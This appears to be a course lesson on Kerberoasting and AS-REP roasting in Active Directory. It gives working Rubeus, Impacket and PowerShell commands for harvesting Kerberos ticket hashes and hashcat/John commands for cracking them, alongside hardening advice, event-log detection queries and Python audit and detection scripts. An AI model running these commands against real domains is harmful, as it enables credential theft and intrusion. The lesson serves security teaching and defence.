Lesson 3: Kerberoasting & AS-REP Roasting
Advanced credential harvesting techniques and hash cracking strategies
Learning Objectives
By the end of this lesson, you will be able to:
- Master Kerberoasting attack methodology and techniques
- Execute AS-REP roasting attacks against vulnerable accounts
- Enumerate service accounts and identify high-value targets
- Implement effective hash cracking strategies
- Analyze attack artifacts and indicators
- Deploy comprehensive prevention and detection mechanisms
Kerberoasting Attack
What is Kerberoasting?
Kerberoasting is a credential harvesting attack that targets service accounts with Service Principal Names (SPNs). It exploits the fact that the service ticket the KDC issues is encrypted with a key derived from the service account's password (its password hash), so any ticket holder can take the ticket offline and try to recover that password.
Kerberoasting Key Characteristics:
- No Privileges Required: Any domain user can request service tickets
- Offline Cracking: Password hashes can be cracked without network access
- High Success Rate: Service accounts often have weak passwords
- Stealth Operation: Appears as normal Kerberos traffic
Kerberoasting Attack Process
Service Account Enumeration
Identify service accounts with SPNs
Enumeration Methods:
- LDAP queries for SPN attributes
- PowerShell Active Directory cmdlets
- Automated enumeration tools
- BloodHound analysis
Service Ticket Request
Request service tickets for identified SPNs
Request Process:
- Use TGT to request service tickets
- Target high-value services (SQL, HTTP, etc.)
- Request tickets for multiple services
- Extract encrypted service tickets
Hash Extraction
Extract password hashes from service tickets
Extraction Methods:
- Parse Kerberos ticket data
- Extract encrypted service ticket portion
- Format hashes for cracking tools
- Organize by service account
Password Cracking
Crack service account passwords offline
Cracking Strategies:
- Dictionary attacks
- Brute force attacks
- Hybrid attacks
- Rule-based attacks
Kerberoasting Implementation
Using Rubeus
Modern C# implementation with advanced features
Command Syntax:
# Basic Kerberoasting
Rubeus.exe kerberoast
# Target specific user
Rubeus.exe kerberoast /user:sqlservice
# Output to file
Rubeus.exe kerberoast /format:hashcat /outfile:hashes.txt
# Use specific TGT
Rubeus.exe kerberoast /ticket:tgt.kirbi
# Kerberoast using alternate credentials for the LDAP enumeration (there is no /password switch)
Rubeus.exe kerberoast /user:sqlservice /creduser:domain.com\user /credpassword:Password123
Using Impacket
Python-based implementation for cross-platform use
Command Syntax:
# Enumerate accounts with SPNs (without -request the tool only lists them)
python GetUserSPNs.py domain.com/user:password -dc-ip 192.168.1.10
# Request specific SPN
python GetUserSPNs.py domain.com/user:password -dc-ip 192.168.1.10 -request-user sqlservice
# Output in hashcat format
python GetUserSPNs.py domain.com/user:password -dc-ip 192.168.1.10 -outputfile hashes.txt
# Use Kerberos authentication
python GetUserSPNs.py -k -no-pass domain.com/sqlservice -dc-ip 192.168.1.10
Using PowerShell
Native PowerShell implementation
Command Syntax:
# Enumerate SPNs
Get-ADUser -Filter "ServicePrincipalName -like '*'" -Properties ServicePrincipalName
# Request a service ticket for one SPN (KerberosRequestorSecurityToken lives in System.IdentityModel, so load it first)
Add-Type -AssemblyName System.IdentityModel
$SPN = "MSSQLSvc/sql01.domain.com:1433"
$Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $SPN
# Extract ticket data: GetRequest() returns the AP-REQ bytes that carry the encrypted service ticket
$TicketBytes = $Ticket.GetRequest()
AS-REP Roasting Attack
What is AS-REP Roasting?
AS-REP Roasting is a credential harvesting attack that targets user accounts with Kerberos pre-authentication disabled. For such accounts the KDC answers an AS-REQ without any proof of the password, so an attacker can collect the AS-REP, whose encrypted part is keyed with the account's password hash, and crack it offline.
AS-REP Roasting Key Characteristics:
- Pre-authentication Disabled: Target accounts must have the DONT_REQ_PREAUTH flag set
- No Credentials Required: The AS-REP can be requested without knowing a valid password
- Offline Cracking: The response ciphertext is cracked without further network access
- High-Value Targets: The flag is often found on service and admin accounts
AS-REP Roasting Attack Process
Vulnerable Account Enumeration
Identify accounts with pre-authentication disabled
Enumeration Methods:
- LDAP queries for userAccountControl
- PowerShell Active Directory cmdlets
- Automated enumeration tools
- BloodHound analysis
AS-REP Request
Request AS-REP without pre-authentication
Request Process:
- Send AS-REQ without pre-authentication data
- Target vulnerable user accounts
- Receive encrypted AS-REP response
- Extract encrypted password hash
Hash Extraction
Extract password hashes from AS-REP responses
Extraction Methods:
- Parse AS-REP Kerberos message
- Extract encrypted credential portion
- Format hashes for cracking tools
- Organize by user account
Password Cracking
Crack user account passwords offline
Cracking Strategies:
- Dictionary attacks
- Brute force attacks
- Hybrid attacks
- Rule-based attacks
AS-REP Roasting Implementation
Using Rubeus
Modern C# implementation with advanced features
Command Syntax:
# Basic AS-REP Roasting
Rubeus.exe asreproast
# Target specific user
Rubeus.exe asreproast /user:vulnerable_user
# Output to file
Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt
# Use specific domain controller
Rubeus.exe asreproast /dc:192.168.1.10
# AS-REP Roast using alternate credentials for the LDAP enumeration (there is no /password switch)
Rubeus.exe asreproast /user:vulnerable_user /creduser:domain.com\user /credpassword:Password123
Using Impacket
Python-based implementation for cross-platform use
Command Syntax:
# Basic AS-REP Roasting
python GetNPUsers.py domain.com/ -dc-ip 192.168.1.10
# Target specific user
python GetNPUsers.py domain.com/vulnerable_user -dc-ip 192.168.1.10
# Output in hashcat format
python GetNPUsers.py domain.com/ -dc-ip 192.168.1.10 -outputfile asrep_hashes.txt
# Use Kerberos authentication
python GetNPUsers.py -k -no-pass domain.com/vulnerable_user -dc-ip 192.168.1.10
Using PowerShell
Native PowerShell implementation
Command Syntax:
# Find vulnerable accounts (4194304 = 0x400000 = DONT_REQ_PREAUTH)
Get-ADUser -Filter {userAccountControl -band 4194304} -Properties userAccountControl
# Request AS-REP
# Note: KerberosRequestorSecurityToken takes an SPN and builds an AP-REQ for a service ticket (a TGS exchange),
# so it cannot send a pre-authentication-free AS-REQ for another account. The native PowerShell route
# covers enumeration only; the AS-REP request itself is done with the Rubeus or Impacket commands above.
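The enumeration steps for both attacks come down to reading two attributes: the userAccountControl bitmask (the 0x400000 bit the Get-ADUser filter above tests) and servicePrincipalName. The following audit script is an added example, not code from this course; it decodes those attributes from constructed directory records and reports which accounts are AS-REP roastable, which are Kerberoastable on a non-gMSA account, and what userAccountControl value to write back to re-enable pre-authentication. The record shape (pre-converted pwdLastSet), the one-year password-age policy and the sample accounts are assumptions.

```python
"""Audit directory records for roasting exposure (added example, not page code).

Records are constructed dictionaries shaped like the LDAP attributes that
ldapsearch or Get-ADUser would return (attribute names are real, values are
made up, pwdLastSet is already converted from FILETIME); no directory is contacted.
"""
from datetime import datetime, timedelta, timezone

# userAccountControl bit flags, as documented by Microsoft
UF_ACCOUNTDISABLE = 0x0002
UF_USE_DES_KEY_ONLY = 0x200000
UF_DONT_REQUIRE_PREAUTH = 0x400000   # 4194304, the bit the page's Get-ADUser filter tests

# Assumed policy: a Kerberoastable password older than this is flagged
MAX_SERVICE_PASSWORD_AGE = timedelta(days=365)


def audit_account(rec, now):
    """Return findings for one record.

    rec uses LDAP attribute names: sAMAccountName, userAccountControl (int),
    servicePrincipalName (list), pwdLastSet (datetime), objectClass (list).
    """
    findings = []
    uac = rec["userAccountControl"]
    if uac & UF_ACCOUNTDISABLE:
        return findings                   # disabled accounts get no tickets, so no exposure
    if uac & UF_DONT_REQUIRE_PREAUTH:
        findings.append("DONT_REQ_PREAUTH set: AS-REP roastable")
    spns = rec.get("servicePrincipalName", [])
    is_gmsa = "msDS-GroupManagedServiceAccount" in rec.get("objectClass", [])
    if spns and not is_gmsa:
        # gMSA passwords are long random values rotated automatically, so only
        # SPNs on ordinary user accounts are a Kerberoasting concern
        findings.append(f"{len(spns)} SPN(s) on a non-gMSA account: Kerberoastable")
        if now - rec["pwdLastSet"] > MAX_SERVICE_PASSWORD_AGE:
            findings.append("service password older than policy maximum")
    if uac & UF_USE_DES_KEY_ONLY:
        findings.append("DES-only keys")
    return findings


def remediated_uac(uac):
    """userAccountControl value to write back so pre-authentication is required again."""
    return uac & ~UF_DONT_REQUIRE_PREAUTH


def audit(records, now):
    """Map sAMAccountName -> list of findings for every record."""
    return {r["sAMAccountName"]: audit_account(r, now) for r in records}


NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)   # constructed audit time

# Constructed sample records
SAMPLE_RECORDS = [
    {"sAMAccountName": "sqlservice", "userAccountControl": 0x10200,  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
     "servicePrincipalName": ["MSSQLSvc/sql01.domain.com:1433"],
     "pwdLastSet": datetime(2019, 3, 10, tzinfo=timezone.utc), "objectClass": ["user"]},
    {"sAMAccountName": "vulnerable_user", "userAccountControl": 0x400200,  # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
     "servicePrincipalName": [],
     "pwdLastSet": datetime(2024, 1, 5, tzinfo=timezone.utc), "objectClass": ["user"]},
    {"sAMAccountName": "gmsa-web$", "userAccountControl": 0x1000,  # WORKSTATION_TRUST_ACCOUNT
     "servicePrincipalName": ["HTTP/web01.domain.com"],
     "pwdLastSet": datetime(2024, 5, 20, tzinfo=timezone.utc),
     "objectClass": ["user", "computer", "msDS-GroupManagedServiceAccount"]},
    {"sAMAccountName": "old_svc", "userAccountControl": 0x400202,  # disabled, so ignored
     "servicePrincipalName": ["CIFS/files01.domain.com"],
     "pwdLastSet": datetime(2015, 1, 1, tzinfo=timezone.utc), "objectClass": ["user"]},
]

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_RECORDS, NOW).items():
        print(f"{name}: {findings or ['no findings']}")
```

The disabled-account and gMSA exclusions keep the report focused on accounts that can actually be roasted; remediated_uac() only clears the one bit, so every other flag on the account is preserved when the value is written back.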
Target Identification and Prioritization
High-Value Service Accounts
Database Services
SQL Server and database service accounts
High-Value SPNs:
- MSSQLSvc/* - SQL Server services
- Oracle/* - Oracle database services
- MySQL/* - MySQL database services
- PostgreSQL/* - PostgreSQL services
Impact:
- Database access and data exfiltration
- Lateral movement to other systems
- Privilege escalation opportunities
Web Services
Web application and HTTP service accounts
High-Value SPNs:
- HTTP/* - Web server services
- HTTPS/* - Secure web services
- IIS/* - Internet Information Services
- Apache/* - Apache web servers
Impact:
- Web application access
- Configuration file access
- Code execution opportunities
File Services
File sharing and storage service accounts
High-Value SPNs:
- CIFS/* - Common Internet File System
- SMB/* - Server Message Block
- NFS/* - Network File System
- SharePoint/* - SharePoint services
Impact:
- File system access
- Data exfiltration
- Share enumeration
Authentication Services
Authentication and directory service accounts
High-Value SPNs:
- LDAP/* - Lightweight Directory Access Protocol
- AD/* - Active Directory services
- Kerberos/* - Kerberos authentication
- RADIUS/* - Remote Authentication Dial-In User Service
Impact:
- Directory service access
- User enumeration
- Authentication bypass
Hash Cracking Strategies
Password Cracking Tools and Techniques
Hashcat
Advanced password recovery tool with GPU acceleration
Features:
- GPU-accelerated cracking
- Multiple attack modes
- Rule-based attacks
- Distributed cracking
Command Examples:
# Dictionary attack
hashcat -m 13100 hashes.txt wordlist.txt
# Brute force attack
hashcat -m 13100 hashes.txt -a 3 ?d?d?d?d?d?d?d?d
# Rule-based attack
hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule
# Hybrid attack
hashcat -m 13100 hashes.txt -a 6 wordlist.txt ?d?d?d?d
John the Ripper
Fast password cracker with multiple modes
Features:
- Multiple hash formats
- Incremental attacks
- Wordlist attacks
- Custom rules
Command Examples:
# Basic cracking
john --wordlist=wordlist.txt hashes.txt
# Incremental attack
john --incremental hashes.txt
# Rule-based attack
john --wordlist=wordlist.txt --rules hashes.txt
# Show cracked passwords
john --show hashes.txt
Custom Wordlists
Targeted wordlists for specific environments
Wordlist Sources:
- Company-specific terms
- Industry terminology
- Common password patterns
- Leaked password databases
Wordlist Creation:
# Combine multiple wordlists
cat wordlist1.txt wordlist2.txt > combined.txt
# Add company-specific terms
echo "CompanyName2023" >> custom.txt
echo "Department2023" >> custom.txt
# Generate password variations
crunch 8 8 -t @@@@@@@@ -o patterns.txt
Prevention and Detection
Defense Strategies
Authentication Hardening
Implementation:
- Enable pre-authentication for all accounts
- Implement strong password policies
- Use managed service accounts
- Regular password rotation
- Multi-factor authentication
Monitoring & Detection
Implementation:
- Monitor Kerberos authentication events
- Alert on unusual ticket requests
- Track failed authentication attempts
- Implement behavioral analysis
- Use SIEM integration
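"Alert on unusual ticket requests" is concrete once the two footprints are named: Kerberoasting shows up as one account requesting RC4 (encryption type 0x17) service tickets (Event ID 4769) for many distinct service accounts in a short window, and AS-REP roasting as a TGT request (Event ID 4768) granted with Pre-Authentication Type 0. The detection logic below is an added example, not code from this course or from any SIEM product; it runs over constructed event records that use the real EventData field names, and the five-SPN threshold and five-minute window are assumed tuning values.

```python
"""Roasting detection over Windows Security events (added example, not page code).

Event records are constructed dictionaries using the EventData field names that
4768 and 4769 carry (TargetUserName, ServiceName, TicketEncryptionType,
PreAuthType, Status, IpAddress); in production they would come from a SIEM or a
Get-WinEvent export.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"        # TicketEncryptionType for RC4-HMAC; AES is 0x11 / 0x12
NO_PREAUTH = "0"         # PreAuthType 0: the TGT was issued without pre-authentication
SPN_THRESHOLD = 5        # distinct services per user per window (assumed tuning value)
WINDOW = timedelta(minutes=5)


def detect_kerberoasting(events, threshold=SPN_THRESHOLD, window=WINDOW):
    """Return (user, ip, count) for each user/IP pair that requested RC4 service
    tickets for at least `threshold` distinct service accounts within `window`."""
    requests = defaultdict(list)  # (user, ip) -> [(time, service account)]
    for ev in events:
        if ev["EventID"] != 4769 or ev["TicketEncryptionType"].lower() != RC4_HMAC:
            continue
        svc = ev["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue  # computer accounts and TGT renewals are not roastable targets
        requests[(ev["TargetUserName"], ev["IpAddress"])].append((ev["TimeCreated"], svc))

    alerts = []
    for (user, ip), reqs in requests.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            # distinct services requested in the window that opens at this request
            distinct = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(distinct) >= threshold:
                alerts.append((user, ip, len(distinct)))
                break
    return alerts


def detect_asrep_roasting(events):
    """Return (user, ip, enc_type) for TGTs granted (Status 0x0) to user accounts
    with no pre-authentication, the footprint AS-REP roasting leaves on the DC."""
    alerts = []
    for ev in events:
        if ev["EventID"] != 4768 or ev["Status"] != "0x0":
            continue
        if ev["PreAuthType"] == NO_PREAUTH and not ev["TargetUserName"].endswith("$"):
            alerts.append((ev["TargetUserName"], ev["IpAddress"], ev["TicketEncryptionType"]))
    return alerts


def _ev(event_id, minute, **fields):
    """Build one constructed event at 09:<minute> on 2024-06-01."""
    rec = {"EventID": event_id, "TimeCreated": datetime(2024, 6, 1, 9, minute),
           "IpAddress": "::ffff:192.168.1.50"}
    rec.update(fields)
    return rec


# Constructed sample: one user pulls RC4 tickets for six services in five minutes,
# a normal AES request from another user, a computer-account ticket, a failed and a
# pre-authenticated TGT request, and one TGT issued with no pre-authentication.
SAMPLE_EVENTS = [
    _ev(4769, m, TargetUserName="jdoe@DOMAIN.COM", ServiceName=svc, TicketEncryptionType="0x17")
    for m, svc in enumerate(["sqlservice", "websvc", "backupsvc", "reportsvc", "spsvc", "exchsvc"])
] + [
    _ev(4769, 3, TargetUserName="asmith@DOMAIN.COM", ServiceName="sqlservice",
        TicketEncryptionType="0x12", IpAddress="::ffff:192.168.1.60"),
    _ev(4769, 4, TargetUserName="jdoe@DOMAIN.COM", ServiceName="WS02$", TicketEncryptionType="0x17"),
    _ev(4768, 0, TargetUserName="jdoe", ServiceName="krbtgt", PreAuthType="0", Status="0x19",
        TicketEncryptionType="0xffffffff"),   # rejected request: ignored because Status is not 0x0
    _ev(4768, 0, TargetUserName="jdoe", ServiceName="krbtgt", PreAuthType="2", Status="0x0",
        TicketEncryptionType="0x12"),
    _ev(4768, 7, TargetUserName="vulnerable_user", ServiceName="krbtgt", PreAuthType="0", Status="0x0",
        TicketEncryptionType="0x17", IpAddress="::ffff:192.168.1.77"),
]

if __name__ == "__main__":
    print("Kerberoasting:", detect_kerberoasting(SAMPLE_EVENTS))
    print("AS-REP roasting:", detect_asrep_roasting(SAMPLE_EVENTS))
```

The RC4 filter matters because modern Windows clients negotiate AES for service tickets, so an RC4 ticket for an AES-capable service is itself unusual; if the environment still has legacy RC4 services, raise the threshold rather than dropping the filter. The AS-REP rule keys on success with no pre-authentication instead of on 4771 failures, because a roastable account never fails pre-authentication.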
Configuration Security
Implementation:
- Review and harden SPN configurations
- Implement least privilege access
- Use group managed service accounts
- Regular security assessments
- Network segmentation
Incident Response
Implementation:
- Develop incident response procedures
- Implement automated response systems
- Regular security training
- Forensic analysis capabilities
- Threat hunting programs
Hands-On Exercise
Exercise: Kerberoasting and AS-REP Roasting Attack Simulation
Objective: Execute Kerberoasting and AS-REP roasting attacks in a controlled environment and implement detection mechanisms.
Steps:
1. Environment Preparation
Set up the attack environment:
# Verify domain access
whoami /all
klist
# Check current tickets
Rubeus.exe klist
# Verify domain information
Get-ADDomain
2. Service Account Enumeration
Identify service accounts with SPNs:
# Enumerate SPNs using PowerShell
Get-ADUser -Filter "ServicePrincipalName -like '*'" -Properties ServicePrincipalName | Select-Object Name, ServicePrincipalName
# Enumerate using LDAP
ldapsearch -H ldap://domain.com -D "user@domain.com" -W -b "DC=domain,DC=com" "(&(objectClass=user)(servicePrincipalName=*))" servicePrincipalName
3. Kerberoasting Attack
Execute Kerberoasting attack:
# Basic Kerberoasting
Rubeus.exe kerberoast
# Target specific service
Rubeus.exe kerberoast /user:sqlservice
# Output in hashcat format
Rubeus.exe kerberoast /format:hashcat /outfile:kerberoast_hashes.txt
# Crack the hashes
hashcat -m 13100 kerberoast_hashes.txt wordlist.txt
4. AS-REP Roasting Attack
Execute AS-REP roasting attack:
# Find vulnerable accounts
Get-ADUser -Filter {userAccountControl -band 4194304} -Properties userAccountControl
# AS-REP Roasting
Rubeus.exe asreproast
# Target specific user
Rubeus.exe asreproast /user:vulnerable_user
# Output in hashcat format
Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt
5. Detection Implementation
Implement detection mechanisms:
# Kerberoasting: service-ticket requests (Event ID 4769) that used RC4 (Ticket Encryption Type 0x17)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769} | Where-Object { $_.Message -match 'Ticket Encryption Type:\s+0x17' }
# AS-REP roasting: TGT requests (Event ID 4768) granted with no pre-authentication (Pre-Authentication Type 0)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4768} | Where-Object { $_.Message -match 'Pre-Authentication Type:\s+0\b' -and $_.Message -match 'Result Code:\s+0x0\b' }
Deliverables:
- Kerberoasting attack demonstration
- AS-REP roasting attack demonstration
- Cracked password hashes
- Detection mechanism implementation
- Security recommendations report